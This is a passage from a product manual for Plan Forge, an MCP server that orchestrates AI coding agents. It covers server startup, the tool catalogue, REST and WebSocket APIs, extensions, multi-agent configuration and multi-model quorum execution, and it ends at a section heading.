📚 Plan Forge Manual

Starting the server, VS Code auto-start, and the essential tools every Forge user needs: forge_capabilities, forge_run_plan, forge_plan_status, forge_smith, and more.

Full Reference

Complete tool tables for all 8 categories (102 tools), REST API endpoints, WebSocket hub events, OTLP telemetry, cost tracking, SDK, and API key configuration.

Discovery first: Call forge_capabilities before anything else, it returns the full live API surface including tool schemas, config options, available extensions, and per-tool error codes. Always authoritative.

📄 Full reference: capabilities, EVENTS.md on GitHub, tools.json on GitHub

Isometric server architecture as stacked amber tower-anvils radiating tool icons connected by data streams

Chapter 11 · Quick Start

MCP Server — Quick Start

Start the server, verify it's running, and call your first forge tools in under five minutes.

New to this chapter? Start at Chapter 11 — MCP Server & Tools for the architecture overview, then return here to get hands-on. The Full Reference has the complete tool tables and REST API.

Starting the Server

Terminal

# Install dependencies (first time only)
cd pforge-mcp && npm install && cd ..

# Full server: MCP + HTTP + WebSocket
node pforge-mcp/server.mjs

# Dashboard only (no MCP stdio)
node pforge-mcp/server.mjs --dashboard-only

# Custom project path
node pforge-mcp/server.mjs --project /path/to/project

With .vscode/mcp.json configured (created by setup.ps1 / setup.sh), the server auto-starts when Copilot calls any forge tool, you don't need to start it manually.

Verify It's Running

Terminal

# Check the health endpoint
curl http://localhost:3100/api/status

# Or open the dashboard in your browser
open http://localhost:3100

Essential Tools

These are the tools you'll use most often. Start with forge_capabilities to discover the full surface; use forge_run_plan to execute your work.

Discovery first: Always call forge_capabilities at the start of a session, it returns the live API surface including tool schemas, config options, extensions, and per-tool error codes.

forge_capabilities — Discovery

Returns the complete, always-authoritative API surface. Call this first.

Copilot Chat

forge_capabilities({})

Returns: tool schemas, intents, config keys, available extensions, per-tool error codes.

forge_smith — Environment Check

Diagnose your setup: VS Code config, Node version, MCP connectivity, preset health, version currency. Run this when something isn't working.

Copilot Chat

forge_smith({})

forge_run_plan — Execute a Plan

Execute a hardened plan file. Spawns workers, validates gates after each slice, tracks tokens and cost. This is the core execution command.

Copilot Chat

// Estimate cost before running (recommended)
forge_run_plan({ plan: "docs/plans/Phase-1.md", estimate: true })

// Execute
forge_run_plan({ plan: "docs/plans/Phase-1.md" })

// Execute with quorum mode
forge_run_plan({ plan: "docs/plans/Phase-1.md", quorum: "auto" })

// Resume from a specific slice
forge_run_plan({ plan: "docs/plans/Phase-1.md", resumeFrom: 3 })

Quorum modes: auto (adaptive), power (flagship models, threshold 5), speed (fast models, threshold 7), false (single model, no quorum).

forge_plan_status — Execution Status

Poll the status of the currently running (or most recent) plan execution. Returns per-slice results, tokens consumed, duration, and gate outcomes.

Copilot Chat

forge_plan_status({})

forge_abort — Stop Execution

Abort the currently running plan execution. The orchestrator finishes the current slice's work-in-progress before stopping.

Copilot Chat

forge_abort({})

forge_diagnose — Bug Investigation

Multi-model bug investigation: provide a source file (and optionally models) and receive root-cause analysis plus fix recommendations.

Copilot Chat

forge_diagnose({ file: "src/services/billing.ts" })

forge_analyze — Consistency Scoring

Cross-artifact consistency scoring (0–100 across 4 dimensions). Checks that your plans, code, tests, and docs are in sync. Run before shipping. plan is required and can point at a plan markdown or a source file.

Copilot Chat

forge_analyze({ plan: "docs/plans/Phase-1-AUTH-PLAN.md" })

forge_estimate_quorum — Cost Preview

Project the cost of a plan under all four quorum modes before executing. Always call this instead of hand-computing costs.

Copilot Chat

forge_estimate_quorum({ planPath: "docs/plans/Phase-1.md" })

Typical Workflow

1. Discover, forge_capabilities({}) to see the live API surface
2. Check setup, forge_smith({}) to confirm everything is green
3. Estimate, forge_estimate_quorum({ planPath: "…" }) before any execution
4. Run, forge_run_plan({ plan: "…" }) to execute your plan
5. Monitor, forge_plan_status({}) to track progress
6. Review, forge_analyze({ plan: "…" }) to confirm artifact consistency

Need the full tool list? See MCP Server — Full Reference for all 102 tools across 8 categories, REST API endpoints, WebSocket events, telemetry, cost tracking, SDK, and API key configuration.

📄 Full reference: capabilities, EVENTS.md on GitHub, tools.json on GitHub

Chapter 11 · Full Reference

MCP Server — Full Reference

Complete tool tables for all 102 MCP tools across 8 categories, REST API endpoints, WebSocket hub events, OTLP telemetry, cost tracking, SDK, and API key configuration.

Just getting started? See MCP Server — Quick Start for the essential tools and a typical workflow. Return here when you need the full catalog or REST API details.

MCP Tools (102, in 8 Categories)

Every tool is callable from Copilot Chat, Claude Code, Cursor, or any MCP-compatible client. Tools are grouped by station / subsystem. The four "station" categories (Crucible, LiveGuard, Tempering, Bug Registry / Testbed) map directly to the four shop stations; the rest are cross-cutting infrastructure.

Discovery first: Call forge_capabilities before anything else, it returns the full live API surface including tool schemas, config options, available extensions, and per-tool error codes. Always authoritative.

Core — Execution, Diagnosis, Skills, Cost, Memory (37 tools)

Everything that powers the Smelt and Forge stations plus the cross-cutting surfaces (skills, memory, cost, search, review queue, notifications, image generation, meta-bug filing).

Tool	Description
Diagnostics & setup
`forge_smith`	Diagnose environment, VS Code config, setup health, version currency. The "shop inspector."
`forge_validate`	Validate setup files, check counts match preset, no placeholders
`forge_sweep`	Scan for TODO/FIXME/HACK/stub/placeholder markers
`forge_capabilities`	Machine-readable API surface, tools, intents, config, extensions, error codes
`forge_status`	Show phases from `DEPLOYMENT-ROADMAP.md` with status
Plan execution (Forge station)
`forge_run_plan`	Execute a hardened plan: spawn workers, validate gates, track tokens. Supports `--quorum=auto\|power\|speed\|false`
`forge_abort`	Abort the currently running plan execution
`forge_plan_status`	Latest execution status, per-slice results, tokens, duration
`forge_diff`	Compare changes against the plan's Scope Contract, detect drift
`forge_new_phase`	Create a new phase plan file + roadmap entry
Analysis & estimation
`forge_analyze`	Cross-artifact consistency scoring (0–100, 4 dimensions)
`forge_diagnose`	Multi-model bug investigation, root cause + fix recommendations
`forge_estimate_quorum`	Projected cost of a plan under all four quorum modes (auto/power/speed/false). Always call this before showing cost estimates, never hand-compute.
`forge_estimate_slice`	Per-slice cost estimate with confidence (heuristic vs historical)
`forge_doctor_quorum`	Diagnose quorum-mode availability and routing issues
`forge_graph_query`	Query the Plan Forge knowledge graph (built post-Slice via `postSlice` hook)
`forge_search`	Cross-artifact search across plans, runs, bugs, memory
Cost & performance
`forge_cost_report`	Cost tracking: total spend, per-model breakdown, monthly trend. Authoritative source for actual spend.
`forge_timeline`	Unified chronological view of runs, incidents, bugs, deploys, fm-turns, crucible events. 9 sources.
`forge_home_snapshot`	Snapshot of the “home” dashboard tile state, aggregate health surface
Skills & review
`forge_run_skill`	Execute a skill programmatically with step-level tracking
`forge_skill_status`	Recent skill execution events from the hub
`forge_review_add`	Queue a review item (used by Step 5 reviewer agents)
`forge_review_list`	List open / resolved review items
`forge_review_resolve`	Resolve a review item with verdict + notes
`forge_patterns_list`	List captured architectural patterns for a project
Memory (Learn station bridge)
`forge_memory_capture`	Normalise and broadcast a `memory-captured` hub event for OpenBrain
`forge_memory_report`	Aggregate report of recent captures, patterns, decisions
Notifications & bridge
`forge_notify_send`	Send a notification via the configured Remote Bridge (Slack / Teams / PagerDuty / OpenClaw / Telegram / Discord)
`forge_notify_test`	Test the Remote Bridge configuration end-to-end
`forge_delegate_to_agent`	Hand a sub-task to a specific reviewer agent in multi-agent mode
Extensions & meta
`forge_ext_search`	Search the community extension catalog
`forge_ext_info`	Detailed info about a specific extension
`forge_org_rules`	Export org custom instructions, consolidate instruction files for GitHub org-level Copilot config
`forge_meta_bug_file`	File a self-repair bug against Plan Forge itself (plan-defect / orchestrator-defect / prompt-defect)
`forge_triage_route`	Route a finding to the appropriate lane (bug / spec / classifier), powers the audit-loop drain
`forge_generate_image`	Generate images via Grok Aurora or DALL-E, save with format conversion

LiveGuard — Post-Ship Defense (14 tools)

The Guard station. Detect drift, capture incidents, watch dependencies, scan for secrets, propose fixes, all running against shipped code. Chapter 17 — LiveGuard Tools Reference covers each one in depth (flags, thresholds, output shapes, severity matrix). Listed here for completeness.

Tool	Description
`forge_liveguard_run`	Composite scan: drift + sweep + secrets + regression + deps + alerts + health. The "everything" command.
`forge_drift_report`	Score codebase against architecture guardrail rules; track drift over time
`forge_secret_scan`	High-entropy secret detection, values always redacted
`forge_dep_watch`	Scan dependencies for CVEs; alert on new vulnerabilities
`forge_regression_guard`	Extract validation gates from plans, execute against codebase
`forge_incident_capture`	Record incidents with severity, affected files, MTTR tracking
`forge_alert_triage`	Read incidents and drift violations, rank by priority
`forge_env_diff`	Environment variable key divergence across `.env` files
`forge_fix_proposal`	Generate scoped 1–2 slice fix plan from a regression / drift / incident finding
`forge_health_trend`	Aggregate drift, cost, incidents, model performance into health score 0–100
`forge_hotspot`	Identify git-churn hotspots, files that change most frequently
`forge_runbook`	Generate an operational runbook from a hardened plan file
`forge_deploy_journal`	Record deployments with version, deployer, notes
`forge_quorum_analyze`	Assemble structured quorum prompt from LiveGuard data, no LLM calls

Watcher — Cross-Project Read-Only Tail (2 tools)

Read-only observation of another project's forge run from a second VS Code session. See Chapter 19 — The Watcher.

Tool	Description
`forge_watch`	Snapshot or analyze (claude-opus-4.7) mode. Returns counts, anomalies, recommendations, diff cursor.
`forge_watch_live`	Live tail, streams events for fixed duration via target's WebSocket hub or events.log polling.

Crucible — Idea Smelting (8 tools)

The Smelt station. Interview-driven plan intake with a critical-fields gate that refuses to finalize until build-command, test-command, scope, gates, and forbidden-actions are all satisfied. Includes a deterministic Spec Kit importer. See Chapter 5 — Crucible.

Tool	Description
`forge_crucible_submit`	Submit a raw idea or feature request to start an interview
`forge_crucible_ask`	Answer the next interview question. Supports an optional `questionId` to refuse on out-of-sync clients with `ASK_QUESTION_MISMATCH`.
`forge_crucible_preview`	Preview the draft plan + flag any unresolved CRITICAL_FIELDS
`forge_crucible_finalize`	Finalize into `docs/plans/Phase-NN.md`. Refuses if plan exists with `PLAN_ALREADY_EXISTS`; pass `overwrite: true` to bypass. Refuses on missing CRITICAL_FIELDS with `CRITICAL_FIELDS_MISSING`.
`forge_crucible_list`	List all in-flight and finalized smelts
`forge_crucible_abandon`	Abandon an in-flight smelt
`forge_crucible_import`	Deterministic Spec Kit importer. Maps a Spec Kit checkout (`spec.md` + `plan.md` + `tasks.md` + optional `constitution.md`) into a Plan Forge smelt under `.forge/crucible/`. No LLM calls. Supports `--dry-run` and `--json`.
`forge_crucible_status`	Inspect imported smelts. Lists all smelts when called without an id, or returns the full smelt record (metadata + draft plan) when given a smelt id.

Tempering — Quality Drains & Audit Loop (5 tools)

Closed-loop self-tempering, scan, triage, fix, repeat until convergence. The audit-loop drain is opt-in via .forge.json → audit.mode = "off" | "auto" | "always". See Audit Loop Deep Dive.

Tool	Description
`forge_tempering_scan`	Run a single tempering scanner (mutation, content-audit, etc.)
`forge_tempering_run`	Run the full standard scanner sequence (10 scanners)
`forge_tempering_drain`	Iterate scan → triage → fix until convergence or `maxRounds`
`forge_tempering_status`	Latest tempering run status, scanners, findings
`forge_tempering_approve_baseline`	Approve current findings as the new baseline for visual-diff scanners

Bug Registry — Closed-Loop Bug Lifecycle (4 tools)

The Learn station. Fingerprint-deduped bug registry: register, fix, validate, remember. See Chapter 23 — The Bug Registry.

Tool	Description
`forge_bug_register`	Register a new bug with title, severity, fingerprint inputs, file paths
`forge_bug_list`	List bugs by status, severity, or fingerprint match
`forge_bug_update_status`	Update status (open / in-progress / fixed / verified / closed). Accepts both `newStatus` and `status`.
`forge_bug_validate_fix`	Run the bug's validation gate against the current codebase to confirm a fix landed

Testbed — Scenario Replay (3 tools)

Replay scenarios against a dedicated fixture repo (typically plan-forge-testbed/) to prove fixes don't regress. See Chapter 24 — The Testbed.

Tool	Description
`forge_testbed_run`	Execute a scenario against the testbed fixture
`forge_testbed_happypath`	Run the happy-path scenario set as a smoke test
`forge_testbed_findings`	Aggregate findings from the latest testbed run

Forge-Master — Read-Only Reasoning Orchestrator (1 MCP tool + REST surface)

Intent classifier with embedding cache and quorum advisory mode. Classifies open-ended prompts, fetches OpenBrain memory, and chains read-only forge tools on your behalf. The bulk of the Forge-Master surface is exposed via /api/forge-master/* REST routes (see below) plus the dashboard's Studio tab; only the one-shot reasoning entry-point is an MCP tool.

Tool	Description
`forge_master_ask`	One-shot reasoning entry point. Accepts a free-form message; returns lane classification, tool-call trace, and synthesized reply. Use for open-ended questions instead of chaining tools yourself.

Forge-Master chapter: The Forge-Master chapter covers the three-stage intent classifier (keyword → embedding cache → router LLM), quorum advisory mode for high-stakes decisions, and the /api/forge-master/cache-stats liveliness endpoint.

REST API

The REST surface is documented in full in Appendix W — REST API Reference: every endpoint, request/response shape, status codes, authentication model, and worked examples. The summary below points at the most-used subsystems, click through to Appendix W for the per-endpoint detail.

Subsystem	What it covers
Discovery	Liveness, version, capability manifest, well-known endpoint.
Plan execution & runs	Trigger/abort runs, traces, replay, plans, workers.
Search, timeline, hub	Cross-surface search, unified timeline, WebSocket upgrade.
Memory	Capture, drain, search, OpenBrain stats.
Crucible	Idea-smelt lifecycle: `submit → ask → preview → finalize`.
LiveGuard	Drift, incidents, deploy journal, regression guard, runbooks, secret scan, dep watch.
Bridge & approvals	The only cross-boundary auth surface (HMAC via `PFORGE_BRIDGE_SECRET`).
Forge-Master	Conversational entrypoint, chat, prefs, cache stats.
Generic MCP dispatcher	`POST /api/tool/:name`, invoke any of the 106 MCP tools over REST.

Trust model: the server binds to 127.0.0.1 only and has no authentication layer of its own; the OS user account is the access boundary. The only exception is the bridge approval surface, which is HMAC-protected. See Appendix W — Authentication, binding, and CORS for the full discussion.

WebSocket Hub

Connect to ws://localhost:3101 for real-time events. The dashboard uses this for live progress updates.

Event	When
`connected`	Client connects, includes event history replay
`run-started`	Plan execution begins
`slice-started`	Slice begins execution
`slice-completed`	Slice passes all validation gates
`slice-failed`	Slice or gate fails
`slice-escalated`	Slice escalated to quorum for multi-model consensus
`run-completed`	All slices finish
`run-aborted`	Execution aborted via `forge_abort`
`skill-started`	Skill execution begins
`skill-completed`	Skill finishes all steps
`approval-requested`	Bridge pauses for external approval
`bridge-notification-sent`	Webhook dispatched (Telegram, Slack, Discord)
`watch-snapshot-completed`	Watcher built a snapshot of a target project
`watch-anomaly-detected`	Watcher detected one or more anomalies (stalled, slice-failed, quorum-dissent, etc.)
`watch-advice-generated`	Watcher analyze-mode produced narrative advice from frontier model
`fm-turn`	Forge-Master turn (intent classification + tool-call trace + reply). Surfaces in the unified Timeline.
`quorum-estimate`	Forge-Master quorum advisory cost estimate, emitted before model dispatch so clients can cancel
`memory-captured`	Decision / pattern / postmortem captured to OpenBrain
`crucible-started` / `crucible-question` / `crucible-finalized`	Crucible interview lifecycle events
`tempering-round-completed`	One round of audit-loop drain finished (scan → triage → fix)
`slice-orphan-warning`	Failed slice's worker deliverables were staged but not committed; recovery commands available

Telemetry

Every plan execution emits OpenTelemetry (OTLP) traces stored in .forge/runs/<timestamp>/traces.json:

Resource context, project name, version, preset, model
Span hierarchy, run → slice → gate → escalation
Severity levels, INFO for passes, WARN for retries, ERROR for failures
Export, traces are OTLP-compatible, send to Jaeger, Grafana Tempo, or any collector

Cost Tracking

The orchestrator tracks tokens and computes cost per slice using a 23-model pricing table:

Per-slice, tokens in/out, model, duration, USD cost
Per-run, total cost, model breakdown
Monthly, aggregated in .forge/cost-history.json
Model performance, .forge/model-performance.json tracks success rate, avg cost, avg duration per model

The orchestrator auto-selects the cheapest model with >80% historical pass rate. Use --estimate to preview costs before executing.

SDK for Integrators

The pforge-sdk/ package provides a JavaScript/TypeScript API for building integrations:

JavaScript

import { createForgeClient } from 'pforge-sdk';

const forge = createForgeClient({ baseUrl: 'http://localhost:3100' });

// Run smith diagnostics
const health = await forge.smith();

// Get cost report
const cost = await forge.costReport();

// Execute a plan
const run = await forge.runPlan('docs/plans/Phase-1.md', {
  mode: 'estimate'
});

The SDK is currently in scaffold stage (v0.1.0), API surface defined, implementation in progress.

API Key Configuration

API keys for external providers (xAI Grok, OpenAI) are resolved in order: environment variable → .forge/secrets.json → null.

.forge/secrets.json

{
  "XAI_API_KEY": "xai-...",
  "OPENAI_API_KEY": "sk-..."
}

The .forge/ directory is gitignored by default, secrets never enter version control.

📄 Full reference: capabilities, Appendix V — Event Catalog (every WebSocket event grouped by family), EVENTS.md on GitHub, tools.json on GitHub

Chapter 12

Extensions

Install, create, and publish guardrail extensions.

What Extensions Add

Extensions are packaged bundles of instruction files, agents, and prompts that add domain-specific guardrails to your project. They give you drop-in expertise for domains you haven't solved yet: instead of writing compliance rules from scratch, install a community extension and get pre-built knowledge.

Browsing the Catalog

Terminal

# Browse all extensions
pforge ext search

# Filter by keyword
pforge ext search compliance

# Get details about a specific extension
pforge ext info saas-multi-tenancy

The catalog is also browsable in the Dashboard Extensions tab.

Featured Extensions

Extension	Category	What It Adds
`saas-multi-tenancy`	Architecture	Tenant isolation patterns, RLS enforcement, cache separation, cross-tenant audit
`azure-infrastructure`	Cloud	Bicep/Terraform guardrails, resource naming, tagging, cost governance
`plan-forge-memory`	Integration	OpenBrain memory, persistent context across sessions, postmortem injection

Installing an Extension

Terminal

# One-step install from catalog
pforge ext add saas-multi-tenancy

# Install from local path
pforge ext install .forge/extensions/my-extension

This copies instruction files to .github/instructions/, agents to .github/agents/, and prompts to .github/prompts/. The extension metadata is tracked in .forge/extensions/.

Creating Your Own Extension

Create directory: .forge/extensions/my-extension/

Add extension.json manifest:

extension.json

{
  "name": "my-extension",
  "version": "1.0.0",
  "description": "Domain-specific guardrails for healthcare",
  "author": "your-name",
  "category": "compliance"
}

Add guardrail files:

Extension structure

my-extension/
├── extension.json
├── instructions/
│   ├── hipaa-compliance.instructions.md
│   └── phi-handling.instructions.md
├── agents/
│   └── hipaa-reviewer.agent.md
└── prompts/
    └── compliance-audit.prompt.md

Test locally: pforge ext install .forge/extensions/my-extension
Publish: pforge ext publish .forge/extensions/my-extension

Publishing

Publishing generates a catalog entry, it doesn't upload anything. You submit via pull request:

Run pforge ext publish .forge/extensions/my-extension
Fork plan-forge on GitHub
Add the generated entry to extensions/catalog.json
Open a PR with title: feat(catalog): add my-extension

Spec Kit compatible: pforge ext publish outputs both a Plan Forge catalog entry and a Spec Kit-compatible extensions.json entry in one command.

Managing Extensions

Terminal

# List installed extensions
pforge ext list

# Remove an extension
pforge ext remove healthcare-compliance

📄 Full reference: Extensions guide, PUBLISHING.md on GitHub

Network of 7 AI tool nodes connected to a central amber anvil

Chapter 13

Multi-Agent Setup

One setup, all agents. Configure Plan Forge for 7 AI tools.

New here? What this chapter is about. Plan Forge isn't tied to one AI tool. Whatever you (or your team) already use, GitHub Copilot, Claude Code, Cursor, Codex, Gemini, Windsurf, the same plans, instructions, and reviewer agents work in all of them. This chapter shows how to install the right files for each tool. You don't need all of them; just pick the agent(s) your team uses.

What gets installed, native config files for each agent (e.g. CLAUDE.md, .cursorrules, AGENTS.md) so the agent reads Plan Forge's guardrails automatically.
Why it matters, you get the same architecture rules, same reviewers, same skills, no matter which AI you're talking to. Switching tools doesn't mean re-teaching the rules.
Default, GitHub Copilot files always install (Plan Forge's reference implementation). Add others with the -Agent flag.

Read this first if you haven't: the orchestration concepts this chapter assumes, intent lanes, quorum advisory, and the Forge-Master reasoning UI, are introduced in the Forge-Master (Deep Dive) sub-chapter and exposed on the Dashboard — Forge-Master tab. Skim either before wiring a second agent in if those terms are new.

One Setup, All Agents

Terminal

# Add all agent adapters at once
.\setup.ps1 -Preset dotnet -Agent all

# Or pick specific agents
.\setup.ps1 -Preset dotnet -Agent claude,cursor

Copilot files are always installed. The -Agent flag adds native files for other tools, each with all 16 guardrail files embedded, prompts as native skills/commands, and 19 reviewer agents as invocable procedures.

Feature Parity Matrix

Feature	Copilot	Claude	Cursor	Codex	Gemini	Windsurf	Generic
Auto-loading instructions	✓ Native	✓ Emulated	✓ Emulated	⚠ Manual	✓ Emulated	✓ Emulated	✗
Pipeline agents	✓ 6	✓ Skills	✓ Commands	✓ Skills	✓ Commands	✓ Workflows	✗
Reviewer agents	✓ 19	✓ 19	✓ 19	✓ 19	✓ 19	✓ 19	✗
MCP tools	✓	✓	✓	⚠ Partial	⚠ Partial	⚠ Partial	✗
Full Auto execution	✓	✓	✓	✓	⚠	✓	✗
Lifecycle hooks	✓	✓ Emulated	✗	✗	✗	✗	✗
Memory bridge	✓ OpenBrain	✓ Native	⚠	⚠	⚠	⚠	✗

GitHub Copilot (Default)

Native integration. Instruction files auto-load via applyTo. Agents appear in the agent picker. Skills invoke via /slash-command. Hooks run automatically. This is the reference implementation, all other agents emulate this behavior.

Key file: .github/copilot-instructions.md

Claude Code

All guardrails embedded in a single CLAUDE.md file. Claude Code reads this automatically at project root. Includes 33+ skills as slash commands, full auto mode, and memory hooks.

Key file: CLAUDE.md

Setup

.\setup.ps1 -Preset dotnet -Agent claude

Cursor

Rules written to .cursorrules and .cursor/rules/*.mdc. Cascade integration loads rules automatically based on file patterns.

Key files: .cursorrules, .cursor/rules/

Codex CLI

Skills as executable scripts in .agents/skills/. Terminal-based execution with all pipeline steps available.

Key file: AGENTS.md

Gemini CLI

Guardrails embedded in GEMINI.md. Commands as .gemini/commands/*.toml files for /planforge-* invocations.

Key files: GEMINI.md, .gemini/commands/

Windsurf

Rules in .windsurfrules and .windsurf/rules/*.md with trigger frontmatter. Workflows mapped to Cascade integration.

Key files: .windsurfrules, .windsurf/rules/

Generic (Any AI Tool)

A single AI-ASSISTANT.md file with copy-paste guardrails. Works with ChatGPT, Ollama, or any tool that accepts text prompts.

Key file: AI-ASSISTANT.md

Cloud Agent

GitHub's Copilot cloud agent uses the same copilot flag, no separate adapter needed. Add copilot-setup-steps.yml to provision the agent's environment:

Terminal

cp templates/copilot-setup-steps.yml .github/copilot-setup-steps.yml

The cloud agent gets all guardrails, MCP tools, and pforge run-plan automatically.

OpenBrain: The Connective Tissue

Across all seven agents, one challenge remains: each tool starts each session with a blank slate. OpenBrain solves this by acting as a shared, persistent memory layer that every agent reads from and writes to, regardless of which tool authored the thought.

When Claude Code resolves an architectural ambiguity, that decision is captured as a thought. When you switch to Copilot the next morning, it retrieves that thought before writing a single line. When your team's Cursor instance encounters the same pattern, it inherits the same guardrails. The agents change; the institutional knowledge compounds.

How it works at the tool level: the Memory bridge row in the Feature Parity Matrix above shows each agent's integration tier. Copilot and Claude have full native integration; Cursor, Codex, Gemini, and Windsurf use the pforge recall CLI to inject context at session start. The Generic adapter includes copy-paste recall snippets.

For a deep dive into the three-tier memory architecture (in-RAM hub → local JSONL → pgvector semantic index), see Unified Memory Across Agents in Chapter 24.

See also: One Framework, Seven AI Agents, a practical walkthrough of how a mixed-agent team operates on a shared Plan Forge project without knowledge silos.

Spec Kit Interop

If you use Spec Kit for specifications, Plan Forge picks up where your specs end. The setup wizard auto-detects existing Spec Kit files and imports them as context. Extensions marked speckit_compatible work in both frameworks.

📄 Full reference: AGENT-SETUP.md on GitHub

Three model-spirit blacksmiths (green, blue, gold) on diverging escalation paths converging on a central decision node, multi-model quorum and routing

Chapter 14

Advanced Execution

Model routing, quorum mode, cost optimization, CI integration, and resume strategies.

Prerequisite refresher: This chapter assumes you know what slices, gates, and scope contracts are (Chapter 2) and have run at least one plan (Chapter 6). If those terms are unfamiliar, start there.

New here? What this chapter is about. Up until now, you've run plans with default settings, one model, one pass, all slices treated equally. This chapter shows you the dials you can turn to make execution cheaper, smarter, or more reliable. Each section is independent, pick what you need:

Model Routing, assign different AI models to different jobs (cheap one for grunt work, expensive one for review).
Escalation Chains, if Model A fails a slice, automatically retry with Model B, then C.
Quorum Mode, have multiple models solve the same slice in parallel and pick the best answer. Higher quality, higher cost.
Cost Optimization & CI Integration, caps, budgets, and running plans inside GitHub Actions.
Resume & Retry, pick up where a failed run left off without redoing finished slices.

Defaults are sensible, you don't need any of this for your first run. Come back when you want to tune.

Model Routing

Assign different models per role in .forge.json:

Same principle as a human team: let the junior do the legwork, the senior does the final check. Costs less, catches more.

.forge.json

{
  "modelRouting": {
    "default": "grok-4",
    "execute": "claude-sonnet-4.6",
    "review": "claude-opus-4.6"
  }
}

Use a fast/cheap model for execution and a more capable model for review. The orchestrator routes each slice to the appropriate model based on its role.

DIRECT_API_ONLY vs COPILOT_SERVABLE v2.81+

Models are split into two routing classes that determine how the orchestrator reaches them:

Class	Models	Routing
`DIRECT_API_ONLY`	`grok-`, `dall-e-`	HTTP API only. No CLI proxy exists. Requires `XAI_API_KEY` / `OPENAI_API_KEY`.
`COPILOT_SERVABLE`	`gpt-`, `chatgpt-` (incl. `gpt-5.3-codex`)	Prefers `gh copilot` CLI proxy when available (uses your Copilot subscription). Falls back to direct OpenAI API if `OPENAI_API_KEY` is set.
Everything else	Claude, Gemini, etc.	CLI-first via the matching agent CLI (`claude`, `gemini`, etc.)

This split (Phase-34, fixes #103) means gpt-* models no longer drop from auto-quorum when OPENAI_API_KEY is unset but gh-copilot is installed. The old pattern conflated “requires direct API” with “routed via HTTP” and unfairly penalized Copilot users.

Escalation Chains

When a model fails a slice, the orchestrator automatically escalates to the next model in the chain:

.forge.json

{
  "escalationChain": ["grok-4", "claude-opus-4.6", "gpt-5.2-codex"]
}

Model A fails → Model B retries the same slice → Model C if B fails too. Emits slice-escalated WebSocket event at each step. No manual intervention required.

Forge Intelligence, Escalation chains auto-tune from history. After 5+ recorded slices, loadEscalationChain() reorders models by success rate × cost efficiency. The best-performing, cheapest model moves to position 1 automatically. No configuration needed, just run plans and the forge learns.

Escalation chain: grok-4 fails, escalates to claude-opus-4.6 which fails, escalates to gpt-5.2-codex which passes — Figure 14-1. Escalation chain

Quorum Mode

Multi-model consensus for complex slices. Multiple models analyze the same problem independently, then a reviewer synthesizes the best approach.

OAuth-only quorum works. If you have a GitHub Copilot subscription and the copilot CLI is logged in, --quorum=power|speed|auto fans out across multiple models without any API keys, each leg is a separate copilot subprocess invoked with a different --model flag. The orchestrator's quorum dispatcher (quorumDispatch) calls spawnWorker once per model inside Promise.all; filterQuorumModels drops any model whose CLI/credentials aren't reachable so the quorum gracefully degrades instead of failing.

Add API keys to mix providers. Set XAI_API_KEY (or drop it in .forge/secrets.json) and a Grok leg joins the same parallel fan-out alongside your Copilot-served legs, see the worked example below.

Not to be confused with Forge-Master's dispatchQuorum, which is HTTP-only and does require per-model API keys. That surface only powers the chat reasoning lane, not run-plan.

Quorum flow: dispatch to 3 models, independent analysis, reviewer synthesizes, then execute — Figure 14-2. Quorum flow

Terminal

# Force quorum on all slices
pforge run-plan docs/plans/Phase-7.md --quorum

# Auto-quorum: only trigger for complex slices (threshold ≥ 6)
pforge run-plan docs/plans/Phase-7.md --quorum=auto

# Custom threshold (1-10, higher = fewer slices use quorum)
pforge run-plan docs/plans/Phase-7.md --quorum=auto --quorum-threshold 8

# Flagship preset (Opus + GPT-5.3-Codex + Grok 4.20, threshold 5)
pforge run-plan docs/plans/Phase-7.md --quorum=power

# Fast preset (Sonnet + GPT-5.4-mini + Grok 4.1 Fast, threshold 7)
pforge run-plan docs/plans/Phase-7.md --quorum=speed

Setting	Effect	Cost Impact
`--quorum`	Every slice gets multi-model consensus	3× normal cost
`--quorum=auto`	Only slices above complexity threshold	1.2–1.5× normal cost
`--quorum=power`	Flagship models (Opus + GPT-5.3-Codex + Grok 4.20), threshold 5, 5min timeout	3× at threshold 5
`--quorum=speed`	Fast models (Sonnet + GPT-5.4-mini + Grok 4.1 Fast), threshold 7, 2min timeout	1.5× at threshold 7
No flag	Single model per slice	1× baseline cost

Worked Example — 2× Copilot CLI + 1× Grok API v2.83+

The most common production setup: ride your Copilot subscription for the bulk of the quorum, add one direct-API leg (Grok or OpenAI) for diversity. Both kinds of leg run in the same Promise.all, no special config to "merge" them.

Step 1: declare the model mix in .forge.json:

.forge.json

{
  "quorum": {
    "models": [
      "gpt-5.3-codex",                  // → copilot CLI subprocess
      "claude-sonnet-4.6",              // → copilot CLI subprocess
      "grok-4.20-0309-reasoning"        // → direct-API worker (XAI_API_KEY)
    ],
    "reviewerModel": "claude-opus-4.7"  // → copilot CLI subprocess
  }
}

Step 2: provision the Grok key (one of):

Terminal

# Option A: env var (per-shell)
$env:XAI_API_KEY = "xai-..."

# Option B: project-local secrets file (gitignored)
# .forge/secrets.json
{ "XAI_API_KEY": "xai-..." }

Step 3: run with quorum:

Terminal

# See the projected cost across all four modes first (always tool-backed)
pforge run-plan --estimate docs/plans/Phase-7.md

# Then run, quorum-eligible slices fan out to all three models in parallel
pforge run-plan docs/plans/Phase-7.md --quorum=auto

What happens at slice dispatch:

quorumDispatch sees three models in the config.
spawnWorker is called three times concurrently. The first two route to the local copilot CLI (no key needed, rides your Copilot subscription); the third routes to the xAI HTTP worker using XAI_API_KEY.
All three return their dry-run analyses. quorumReview synthesises them via the reviewer model into a single enhancedPrompt.
The actual slice execution runs once with that synthesised prompt, not three concurrent edits.

If the Grok key is missing, filterQuorumModels drops Grok from the list at run-plan startup and the quorum proceeds with the two Copilot-served legs, no failure, just a smaller jury.

Quorum Mode vs Quorum Advisory — What's the Difference? v2.78+

Two surfaces use the word "quorum." They're related but operate at different scopes:

	Quorum Mode (this section)	Quorum Advisory (Forge-Master)
Where	`forge_run_plan` / `--quorum=…`	`forge_master_ask` / Studio tab
Decision unit	Per slice	Per prompt
Auto-winner?	Yes, reviewer synthesizes one approach	No, human picks the reply
Activation	`--quorum=auto/power/speed` CLI flag	`forgeMaster.quorumAdvisory: "auto" \\| "always"` in `.forge.json`
Cost preview	`forge_estimate_quorum` tool	`quorum-estimate` SSE event before dispatch (cancellable)
Best for	High-complexity slice execution that benefits from multi-model consensus	High-stakes judgment calls (architectural choices, trade-offs) where dissent is the signal

You can use both. Quorum Mode runs slice execution; Quorum Advisory helps you decide what to put in the slice in the first place.

Estimating Quorum Cost — `forge_estimate_quorum` v2.83+

